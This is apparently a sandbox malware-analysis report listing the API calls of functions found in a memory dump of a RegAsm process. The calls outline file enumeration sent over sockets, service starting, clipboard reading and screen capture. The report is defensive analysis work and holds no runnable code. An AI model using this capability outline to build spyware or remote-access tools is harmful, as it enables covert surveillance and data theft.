Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
FindClose.KERNEL32(00000000), ref: 004093C1

Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C

FindClose.KERNEL32(00000000), ref: 004095B9

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
String ID:
API String ID: 1824512719-0
Opcode ID: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
Opcode Fuzzy Hash: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98

Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9

Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 0041B4B9
LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3

Strings

SETTINGS, xrefs: 0041B4AC

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8

Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040966A
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
Opcode Fuzzy Hash: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58

Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408811
FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
__CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
Opcode Fuzzy Hash: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99

Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

XPG, xrefs: 0040793A
XPG, xrefs: 00407877

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: XPG$XPG
API String ID: 4113138495-1962359302
Opcode ID: ef4afc18dc9d34da461ea20a285219582541565e32a666253127ded6bb227160
Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
Opcode Fuzzy Hash: ef4afc18dc9d34da461ea20a285219582541565e32a666253127ded6bb227160
Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B

Function 00451CD8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB

Strings

sJD, xrefs: 00451DD1, 00451E19, 00451EC1

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
String ID: sJD
API String ID: 1661935332-3536923933
Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769

Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58

Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0043BC1A
SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48

Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0040B711
GetClipboardData.USER32 ref: 0040B71D
CloseClipboard.USER32 ref: 0040B725

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD

Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0044EA0C

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54

Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D

Strings

lJD, xrefs: 00451FA0

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: lJD
API String ID: 1084509184-3316369744
Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44

Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082

Strings

lJD, xrefs: 0045203B

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: lJD
API String ID: 1084509184-3316369744
Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604

Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940

Strings

GetLocaleInfoEx, xrefs: 00448908

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
Opcode Fuzzy Hash: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E

Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
HeapFree.KERNEL32(00000000), ref: 004120EE

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
Opcode Fuzzy Hash: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58

Function 00434C52 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94

Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58

Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698

Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897

EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09

Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754

Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

Function 00418E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
CreateCompatibleDC.GDI32(00000000), ref: 00418E9D

Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355

CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
DeleteDC.GDI32(00000000), ref: 00418F2A
DeleteDC.GDI32(00000000), ref: 00418F2D
DeleteObject.GDI32(00000000), ref: 00418F30
SelectObject.GDI32(00000000,00000000), ref: 00418F51
DeleteDC.GDI32(00000000), ref: 00418F62
DeleteDC.GDI32(00000000), ref: 00418F65
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
GetIconInfo.USER32 ref: 00418FBD
DeleteObject.GDI32(?), ref: 00418FEC
DeleteObject.GDI32(?), ref: 00418FF9
DrawIcon.USER32(00000000,?,?,?), ref: 00419006
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
DeleteDC.GDI32(?), ref: 0041917C
DeleteDC.GDI32(00000000), ref: 0041917F
DeleteObject.GDI32(00000000), ref: 00419182
GlobalFree.KERNEL32(?), ref: 0041918D
DeleteObject.GDI32(00000000), ref: 00419241
GlobalFree.KERNEL32(?), ref: 00419248
DeleteDC.GDI32(?), ref: 00419258
DeleteDC.GDI32(00000000), ref: 00419263

Strings

DISPLAY, xrefs: 00418E89

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

